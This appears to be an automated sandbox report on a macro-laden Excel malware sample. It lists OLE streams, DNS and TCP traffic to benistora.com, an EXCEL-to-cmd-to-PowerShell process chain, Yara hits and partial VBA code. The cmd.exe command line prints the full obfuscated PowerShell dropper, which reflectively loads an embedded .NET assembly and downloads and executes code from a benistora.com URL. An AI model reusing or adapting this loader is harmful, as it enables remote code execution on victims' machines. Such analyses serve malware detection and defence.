Data Raw:	09 08 10 00 00 06 05 00 54 38 cd 07 c1 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 06 00 00 49 45 55 73 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 498

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	498
Entropy:	5.1926910321
Base64 Encoded:	True
Data ASCII:	I D = " { E 3 4 8 2 8 F 0 - 3 6 0 5 - 4 2 B 9 - A 2 6 7 - 5 8 7 C F F 8 F E 2 8 A } " . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B 0 B 2 5 0 9 6 5 4 9 6 5 4 9 6 5 4 9 6 5 4 " . . D P B = " C 4 C 6 2 4 B 2 2 C C 7 2 D C 7 2 D C 7 " . . G C = " D 8 D A 3 8 B B 3 9 B B 3 9 4 4
Data Raw:	49 44 3d 22 7b 45 33 34 38 32 38 46 30 2d 33 36 30 35 2d 34 32 42 39 2d 41 32 36 37 2d 35 38 37 43 46 46 38 46 45 32 38 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 62

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	62
Entropy:	3.05546715432
Base64 Encoded:	False
Data ASCII:	S h e e t 1 . S . h . e . e . t . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . . .
Data Raw:	53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3809

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3809
Entropy:	4.72272965281
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 b2 00 00 03 00 ff 11 04 00 00 09 04 00 00 a4 03 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2298

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2298
Entropy:	3.6078989953
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ F . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F U . . . , D . . . . . i . . . . . . . . . . . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 04 00 06 00 04 00 06 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 212

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	212
Entropy:	1.79706450809
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . n Z . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 06 00 00 00 00 00 00 09 31 04

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 1753

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_4
File Type:	data
Stream Size:	1753
Entropy:	2.33078988152
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 11 0a 00 00 00 00 00 00 00 00 00 00 41 0a 00 00 00 00 00 00 00 00 00 00 71 0a

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 1088

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_5
File Type:	data
Stream Size:	1088
Entropy:	2.46479710243
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 04 00 00 00 03 60 04 01 81 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 775

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	775
Entropy:	6.41081502848
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . / . T ^ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 03 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 a4 03 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 2f e0 54 5e 17 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2019 17:16:25.936528921 CET	51204	53	192.168.1.82	8.8.8.8
Mar 5, 2019 17:16:26.205543041 CET	53	51204	8.8.8.8	192.168.1.82
Mar 5, 2019 17:16:26.284962893 CET	49218	443	192.168.1.82	5.188.60.66
Mar 5, 2019 17:16:29.292298079 CET	49218	443	192.168.1.82	5.188.60.66
Mar 5, 2019 17:16:35.291960001 CET	49218	443	192.168.1.82	5.188.60.66

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 5, 2019 17:16:25.936528921 CET	51204	53	192.168.1.82	8.8.8.8
Mar 5, 2019 17:16:26.205543041 CET	53	51204	8.8.8.8	192.168.1.82

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 5, 2019 17:16:25.936528921 CET	192.168.1.82	8.8.8.8	0xc0e7	Standard query (0)	benistora.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 5, 2019 17:16:26.205543041 CET	8.8.8.8	192.168.1.82	0xc0e7	No error (0)	benistora.com		5.188.60.66	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2916 Parent PID: 536

General

Start time:	17:15:25
Start date:	05/03/2019
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x2f610000
File size:	20392608 bytes
MD5 hash:	716335EDBB91DA84FC102425BFDA957E
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1660 Parent PID: 2916

General

Start time:	17:16:07
Start date:	05/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)7+@(64)+@(0)35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)7+@(4)'+'+@(0)8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)19+@(96,0,0,12)+@(0)52+@(32,'+'0,0,8)+'+'@(0)11+@(8,32,0,0,72)+@(0)11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)14+@(64,0,0,64,46'+',114,1'+'01,108,111,99,0,0,12,0,0,'+'0,0,96,0,0,0,2,0,0,0,1'+'0)+@(0)14+@(64,0,0,66)+@(0)16+@(96,35,0,0,0,0,0,0,72,0,0,0,2,0,5,0,120,32,0,0,17'+'2,2,0,0,1)+@(0)55'+'+@(19,48,2,0,17,0,0,0,1,'+'0,0,17,0,115,3,0,0,10,2,40,4,0,0,10,10,43,0,6,42,30,2,40,5,0,0,10,42,0,0,0,66,83,74,66,1,0,1,'+'0,0,0,0,0,12'+',0,0,0,118,50,46,48,46,53,48,55,50,55,0,0,0,0,5,0,108,0,0,0,12,1,0,0,35,126,0,0,120,1,0,0,208,0,0,0,35,83,116,114,105,110,103,115,0,0,0,0,7'+'2,2,0,0,8,0,0,0,35,85,83,'+'0,80,2,0,0,16,0,0,0,35,71,85,73,68,0,0,0,96,2,0,0,76,0,0,0,35,66,108,111,98)+@(0)7+@(2,0,0,1,71,21,2,0,9,0,0,0,0,250,1,51,0,22,0,0,1,0,0,0,4,0,0,0,2'+',0,0,0,2,0,0,0,1,0,0,0,5,0,0,0,2,0,0,0,1,0,0,0,1,0,0,0,2,'+'0,0,0,'+'0,0,10,0,1,0,0,0,0,0,6,0,45,0,38,0,6,0,96,0,64,0,6,0,128,0,64,0,10,0,180,0,169,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,16,0,21,0,0,0,5,0,1,0,1,0,80,32,0,0,0,0,150,0,52,0,10,0,1,0,1'+'09,32,0,0,0,0,134,24,58,0,15,0,2,0,0,0,1,0,165,0,17,0,58,0,19,0,25,0,58,0,15,0,33'+',0,58,0,15'+',0'+',33,0,190,0,24,0,9,0,58,0,15,0,46,0,11,0,33,0,46,0,19,0,42,0,29,0,4,128)+@(0)16+@'+'(158,0,0,0,2)+@(0)11+'+'@(1,0,29,0,0,0,0,0,2)+@(0)11+@(1'+',0,38)+@(0)8+@(60,77,111,100,117,108,101,62,0,99,114,97,100,108,101,46,100,108,108,0,82,70,111,108,68,89,75,0,109,115,99,111,114,108,105,98,0,83,121,115,116,101'+',109,0,79,98,106,101,99,116,0,81,99,90,'+'113,'+'1'+'07,0,46,99,116,111,114,0,83,121,115,116,101,10'+'9,46,82,117,110,116,105,109,101,46,67,111,10'+'9,112,105,108,101,11'+'4,83,101,114,118,105,99,101,115,0,67,111,109,112,105,108,'+'97,116,105,111,110,82,101,108,97,120,97,116,105,111,110,115,65,116,116,114,1'+'05,98,117,116,101,0,82,117,110,116,105,109,101,67,111,109,112,97,116,105,98,105,108,105,116,121,65,116,116,114,105'+',98,'+'117,116,101,0,99,1'+'14,97,100,108,101,0,117'+',114,108,0,83,121,1'+'15,11'+'6,101,109,46,78,101,116,0,87,101,98,67,108,105,101,110,116,0,68,111,119'+','+'110,108,111,97,100,83,116'+',114,105,110,103,0,0,0,0,0,3,32,0,0,0,0,0,5'+'8,148,124,63,2,180'+',198,73,168,1'+'11,105,133,161,93,80,139,0,8,183,122,92,86,25,52,224,'+'137,4,0,1,14,14,3,32,'+'0,1,4,32,1,1,8,4,32,1,14,14,3,7,1,14,8,1,0,8,0,0,0,0,0,30,1,0,1,0,84,2,22,87,114,97,'+'112,78,111,110,69,120,99,101,112,116,105,111,110,8'+'4,104,114,111,119,115,1,0,0,0,76,35)+@(0)8+@(0,0,110,35,0,0,0,32)+@(0)22+@(96,35)+@(0)20+@(95,67,111,114,68,108,108,77,97,105,110,0,109,115,99,111,114,101,101,46,100,108,108,0,0,0,0,0,255,37,0,32,64)+@(0)139+@(1,0,16,0,0,0,24,0,0,12'+'8)+@(0)14+@(1,0,1,0,0,0,48,0,0,128)+@(0)14+@(1,0,0,0,0,0,72,0,0,0,88,64,0,0,68,2)+@'+'(0)8+@(0,0,68,2,52,0,0,0,86,0,83,0,95,0,86,0,69,0,82,0,83,0,73,0,79,0'+',78,0,95,0,73,0,78,0,70,0,7'+'9,0,0,'+'0,0'+',0,189,4,239,254,0,0,1)+@(0)16+@(0,63)+@('+'0)7+@(4,0,0,0,2)+@(0)14+@(0,68,0,0,0,1,0,86,0,97,0,114,0,70,0,105,0,108,0,101,0,73,0,110,0,102,0,111,0'+',0,0,0,0'+',36,0,4,0,0,0,84,0,114,0,97,0,110,0,115,0,108,0,97,0,116,0,105,0,111,0,110)'+'+@(0)7+@(176,4,164,1,0,0,1,0,83,0,116,0,114,0,105,0,110,0,103,0,70,0,105,0,108,'+'0,101,0,73,0,110,0,102,0,111,0,0,0,128,1,0,0,1,0,48,0,48,0,48,0,48,0,48,0,52,0,98,0,48,0,0,0,44,0,2,0,1,0,70,0,105,0,108,'+'0,101,0,68,0,101,0,115,0,99,0,114,0,105'+',0,112,0,116,0,105,0,111,0,110,0,0,0,0,0,32,0,0,0,48,0,8,0,'+'1,0,70,0,105'+',0,108,0,101,0,86,'+'0,101,0,114,0,115,0,105,0,111,0,110'+',0,0,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,0,0,0,56'+',0,11,0,1,0,73,0,110,0,116,0,101,0,114,0,110,0,97,0,108,0'+',78,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100,0,108,0,101,0,46,0,100,0,108,0,108,0,0,0,0,0,40,0'+',2,0,1,0,76,0,101,0,103,0,97,0,108,0,67,0,111,0,112,0,121,0,114,0,105,0,103,0,104,'+'0,116,0,'+'0,0,32'+',0,0,0,64,0,1'+'1,0,1,0,79,0,114,0'+',10'+'5,0,103,0,105,0,110,0,97,0,108,0,70,0,105,0,108,0,101,0,110,0,97,0,109,0,101,0,0,0,99,0,114,0,97,0,100'+',0'+',108,0,101,0,46,0,100,0,108,0,108'+',0,0,0,0,0,52,0,8,0,1,0,80,0,114,0,111,0,1'+'00,0,117,'+'0,99,0,116,0,86,0,101,0,114,0,115,0,105,0,111,0'+',110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48,'+'0,0,0,5'+'6,0,8,0,1,0,65,0,115,0,115,0,101,0,109,0,98,0,108,0,121,0,32,0,86,0,101,0,114,0,115,0'+',105,0,111,0,110,0,0,0,48,0,46,0,48,0,46,0,48,0,46,0,48)+@(0)360+@(32,0,0,12,0,0,0,128,51)+@(0)502));^&(1gY{0}{1}1gY -f('+'1gY{0}{1}1gY-f 0BvS0Bv,0Bvet-It0Bv),0Bvem0Bv) (1gY{2}{1}{0}1gY-f (1gY{1}{0}1gY -f0Bv080Bv,0Bvle:0Bv),(1gY{0}{1}1gY-f0Bvr0Bv,0Bviab0Bv),0BvVa0Bv) (1gY{5}{8}{2}{6}{0}{3}{4}{7}{1}{9}{10}1gY-f 0Bvom/uplo0B'+'v,0Bvi0Bv,0Bv/0Bv,0Bva0Bv,0Bvds/0Bv,'+'0Bvhttp0Bv'+',0Bvbenistora.c0Bv,0Bvaud0Bv,0Bvs:/0Bv,0Bvo.70Bv,0Bvz0Bv'+');hGD{nsKpUll}=[System.Refle'+'ction.Assembly]::([System.Reflection.Assembly].1'+'gYGeTMeTHsKposKpDS1gY()tT1.(1gY{1}{0}1g'+'Y -f0Bvere0Bv,0BvWh'+'0Bv){(^&(1gY{1}{0}1gY -f0BvI0Bv,0BvGC0Bv) (((1gY{1}{2}{3}{0}1gY-f 0Bv_0Bv,(1gY{0}{1}1g'+'Y -f0BvVar0Bv,0Bvia0Bv),0Bvble0Bv,0Bv:{0}0Bv)) -F [cHAR]92)).1gY'+'VasKplUE1'+'gY.1gYnAsKpmE1gY-clike(1gY{0'+'}{1}1gY-f0BvL0Bv,0Bvod0Bv)}tT1.(0Bv%0Bv){(.(0BvGV0Bv) (0Bv_0Bv) -ValueOn).1gYnasKpME1gY}tT1.(1gY{0}{1}{2}1gY -f0BvSe0Bv,0Bvl0Bv,0Bvect0Bv) -La 1).1'+'gYisKpNvsKpoKE1gY((^&(0BvGV0Bv) '+'(1gY{0}{1}1gY -f0BvkM0Bv,0Bvq0Bv)).1gYVAsKplUE1gY)'+';([RFolDYK]::1gYqCsKpzqk1gY.Invoke((.(1gY{0}{1}1gY-f0BvD0Bv,0BvIR0Bv) (((1gY{2}{3}{1}{0}{4}1gY -f'+'0BvNI00Bv,0Bv:O0Bv,0BvVar0Bv,(1gY{1}{0}1'+'gY-f0Bvble0Bv,0Bvia0'+'Bv),0Bv80Bv)) -cREPla'+'CE([cHAR]79+[cHAR]7'+'8+[cHAR]73),[cHAR]92)).1gYVsKpAlUe'+'1gY))tT1.(^&(1g'+'Y{1}{0}1gY-f (1gY{1}{0}1gY -f 0Bv-Alias0Bv,0Bvt0Bv),0BvGe0Bv) (1gY{0}{1}1gY-f0BvIE0Bv,0Bv*0Bv))') -crEPLaCe ([cHAr]115+[cHAr]75+[cHAr]112),[cHAr]96-crEPLaCe '1gY',[cHAr]34 -ReplacE ([cHAr]48+[cHAr]66+[cHAr]118),[cHAr]39-crEPLaCe'hGD',[cHAr]36-ReplacE([cHAr]116+[cHAr]84+[cHAr]49),[cHAr]124) ) &&sET SUg=POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )&& cmd /c%sUG%'
Imagebase:	0x49da0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 964 Parent PID: 1660

General

Start time:	17:16:08
Start date:	05/03/2019
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c%sUG%
Imagebase:	0x49da0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 524 Parent PID: 964

General

Start time:	17:16:08
Start date:	05/03/2019
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) )
Imagebase:	0x223f0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.1636004810.01A69000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.1638447073.04EE0000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.1635995960.01A60000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.1634369984.00150000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.1634433896.00190000.00000004.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.1634948704.011C0000.00000004.sdmp, Author: Florian Roth Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1634387196.00160000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1634303771.000D0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1638385697.04350000.00000004.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1638206829.03EE0000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1635853654.01920000.00000002.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1634554312.00220000.00000008.sdmp, Author: unknown Rule: Embedded_PE, Description: unknown, Source: 00000005.00000002.1636329423.01D34000.00000004.sdmp, Author: unknown
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "st1, 1, 0, MSForms, Frame"
11	#if VBA7 then
12	Private Declare PtrSafe Function GetUserDefaultLCID% Lib "kernel32" ()
13	Private Declare PtrSafe Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA"(ByVal Locale as Long, ByVal LCType as Long, ByVal lpLCData as String, ByVal cchData as Long) as Long
14	Private Declare PtrSafe Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA"(ByVal Locale as Long, ByVal LCType as Long, ByVal lpLCData as String) as Boolean
15	#else
16	Private Declare Function GetUserDefaultLCID% Lib "kernel32" ()
17	Private Declare Function GetLocaleInfo Lib "kernel32" Alias "GetLocaleInfoA"(ByVal Locale as Long, ByVal LCType as Long, ByVal lpLCData as String, ByVal cchData as Long) as Long
21	Private Declare Function SetLocaleInfo Lib "kernel32" Alias "SetLocaleInfoA"(ByVal Locale as Long, ByVal LCType as Long, ByVal lpLCData as String) as Boolean
24	#endif
28	Private Const LOCALE_ICOUNTRY = &H5
29	Public intA as Integer
30	Private Const belll = 24

Executed Functions

Subroutine st1_Layout, APIs: 11, Strings: 0, Number of lines: 18, Relevance: 38.518

APIs	Meta Information
GetUserDefaultLCID
kernel32!GetLocaleInfoA	kernel32!GetLocaleInfoA(1033,5,,0)
LOCALE_ICOUNTRY
lpLCDataVar
String$
kernel32!GetLocaleInfoA	kernel32!GetLocaleInfoA(1033,5,"\x00\x00",2)
LOCALE_ICOUNTRY
InStr	InStr("1\x00","\x00") -> 2
Chr$
Left$
vbLong

Line	Instruction	Meta Information
44	Private Sub st1_Layout()
45	cu = 0	executed
46	Dim Symbol as String
